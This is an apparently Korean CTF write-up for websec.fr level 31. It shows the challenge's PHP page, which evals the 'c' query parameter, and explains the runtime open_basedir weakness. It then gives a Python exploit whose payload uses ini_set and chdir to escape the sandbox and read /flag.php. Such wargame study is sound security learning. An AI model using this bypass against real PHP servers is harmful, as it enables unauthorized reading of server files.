Wargame/websec.fr

websec.fr medium level 31

JeonYoungSin 2019. 8. 23. 21:00

source.php


 <?php
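// Challenge setup: restrict file access to /sandbox through open_basedir and
// make that directory the working directory.
// NOTE(review): the directive is set from inside the script itself, so any code
// that runs later in the same request (see the eval() below) can call ini_set()
// on it again. It is a guard rail, not an isolation boundary.
ini_set('open_basedir', '/sandbox');
chdir('/sandbox');

// Every notice, warning and error is echoed back to the client, which exposes
// paths and internals to whoever sends the request.
ini_set('display_errors', 'on');
ini_set('error_reporting', E_ALL);

// SECURITY: the `c` query parameter is executed verbatim as PHP. This is the
// deliberate premise of the level, so it is flagged here rather than replaced.
// Outside a wargame, request data must never reach eval(). If untrusted PHP
// really has to run, the restriction belongs outside the script's reach
// (e.g. php_admin_value open_basedir, disable_functions, and OS-level
// isolation such as a separate user or container).
if (isset($_GET['c'])) {
    die(eval($_GET['c']));
}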
?>

<!DOCTYPE html>
<html lang="en">
<head>
    <title>#WebSec Level Thirty-one</title>
    <link rel="stylesheet" href="../static/bootstrap.min.css" />
</head>
<body>
    <div id="main">
        <div class="container">
            <div class="row">
                <h1>Level Thirty-one <small>- Since web browsers have sandboxes, why not php too?</small></h1>
            </div>
            <div class="row">
                <p class="lead">
                                        Can you read the <code>./flag.php</code> file?
                    You can take a look at the the source code <a href="source.php">here</a>.
                </p>
            </div>
        </div>
        <div class="container">
            <div class="row">
                <!-- Submits the "c" field as a GET query parameter to this same page (action="");
                     the PHP block at the top of the file passes $_GET['c'] straight to eval(). -->
                <form action="" method="get" class="form-inline">
                    <label class="sr-only" for="c">Your text to store.</label>
                    <input type="text" id="c" class='form-control' name="c" size=96 placeholder="Your command.">
                    <button type="submit" value="Submit" name="submit" class="btn btn-default">execute</button>
                </form>
            </div>    
        </div>
    </div>
</body>
</html>


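대놓고 open_basedir bypass를 해보라고 짜 놓은 코드인 걸 볼 수 있다. phpinfo()로 버전을 확인해보면 7.2.9 버전으로 나름 최근 버전이라, 올해 초에 돌았던 latest open_basedir trick으로 bypass해주면 된다. 이때 mkdir은 권한 때문에 안 먹히는데, sandbox 디렉토리에 기본적으로 tmp 디렉토리를 만들어 놨길래 이걸 사용했다. 결국 open_basedir는 실행 중인 스크립트가 ini_set으로 다시 설정할 수 있는 값이라, eval로 임의 코드를 실행시켜 주는 환경에서는 격리 수단으로 믿을 수 없다는 게 이 문제의 핵심이다.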


exploit.py


import requests


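def exploit(payload):
    """Send ``payload`` to the level 31 page and print the response body.

    The payload is passed as the ``c`` query parameter, together with the
    ``submit`` field the page's form sends. Nothing is returned; the HTML
    (including any output produced by the evaluated PHP) is written to stdout.

    Args:
        payload: PHP source text for the ``c`` parameter.
    """
    url = "https://websec.fr/level31/index.php"
    params = {"c": payload, "submit": "Submit"}

    # A timeout keeps the script from hanging indefinitely if the server
    # never answers.
    response = requests.get(url, params=params, timeout=10)

    # print() with a single argument behaves the same on Python 2 and 3; the
    # original statement form (`print result`) is a syntax error on Python 3.
    print(response.text)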


# PHP statements delivered through the `c` parameter and run by the
# challenge's eval(). Only ini_set(), chdir() and file_get_contents() are
# used: open_basedir is re-set three times (ending with '/') while the working
# directory moves into ./tmp and then up six levels, after which /flag.php is
# read from the filesystem root.
# NOTE(review): for defenders, runtime ini_set('open_basedir', ...) calls with
# relative values such as '..' are a signal worth alerting on. Setting the
# directive outside the script (e.g. php_admin_value) should stop request
# code from changing it -- confirm against the deployed SAPI.
payload = """

ini_set('open_basedir','/sandbox');

chdir('./tmp');

ini_set('open_basedir','..');

chdir('..');

chdir('..');

chdir('..');

chdir('..');

chdir('..');

chdir('..');

ini_set('open_basedir','/');

var_dump(file_get_contents('/flag.php'));

"""


# Send the request once; exploit() prints the response body.
exploit(payload)